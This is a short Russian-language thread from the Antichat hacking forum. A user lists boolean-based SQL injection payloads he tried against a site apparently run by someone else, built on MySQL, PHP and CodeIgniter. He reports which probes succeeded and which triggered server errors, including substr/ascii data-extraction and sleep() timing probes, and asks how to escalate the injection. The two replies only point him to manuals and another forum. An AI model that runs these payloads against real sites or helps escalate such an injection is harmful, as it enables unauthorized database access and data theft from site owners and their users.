ANTICHAT

ANTICHAT (https://forum.antichat.xyz/index.php)
-   Веб-уязвимости (https://forum.antichat.xyz/forumdisplay.php?f=114)
-   -   Есть возможность раскрутить Sql Injetion? (https://forum.antichat.xyz/showthread.php?t=584922)

WallHack 23.04.2025 12:34
Всем привет.
Нашел вроде Sql Inection BOOLEN BASED, но пишут что у них везде проверки и в их базу нечего внедрено не было.
Запросы:
add' -- - Работает
add' AND 2*3*8=6*8 AND '000mW7b'!='000mW7b% - Информация есть
add' AND 1*3*8=6*8 AND '000mW7b'!='000mW7b% - Нет

add' AND '1'='1 - Инормация есть
add' AND '1'='2 - Нет

При попытки добавить запросы выбивает ошибку 500:

add' AND (ascii(substr((select database()),1,1))) > 100 AND '000mW7b'!='000mW7b% - Ошибка 500
add' AND (ascii(substring(version(),2,1)))=56-- - - Ошибка 500
aa' and sleep(4) and '1'='1 - Ошибка 500

Wappalyzer показывает:
Mysql, php, CodeIgniter

Есть возможность раскрутить? Может мне надо обратить на что то внимания?

larchik 23.04.2025 19:45
Ну так надо крутить, чтоб понять, есть ли возможность ) Ясновидящих тут нет.
Вооружайся мануалами, шпаргалками, статьями из инета, документацией по mysql и крути.

Местный 23.04.2025 21:23
Цитата:

wallhack сказал(а):

Всем привет.
Нашел вроде Sql Inection BOOLEN BASED, но пишут что у них везде проверки и в их базу нечего внедрено не было.
Запросы:
add' -- - Работает
add' AND 2*3*8=6*8 AND '000mW7b'!='000mW7b% - Информация есть
add' AND 1*3*8=6*8 AND '000mW7b'!='000mW7b% - Нет

add' AND '1'='1 - Инормация есть
add' AND '1'='2 - Нет

При попытки добавить запросы выбивает ошибку 500:

add' AND (ascii(substr((select database()),1,1))) > 100 AND '000mW7b'!='000mW7b% - Ошибка 500
add' AND (ascii(substring(version(),2,1)))=56-- - - Ошибка 500
aa' and sleep(4) and '1'='1 - Ошибка 500

Wappalyzer показывает:
Mysql, php, CodeIgniter

Есть возможность раскрутить? Может мне надо обратить на что то внимания?
На соседнем форуме есть топик "Найденные интересеные SQL inj & XSS". Там могут помочь


Время: 17:09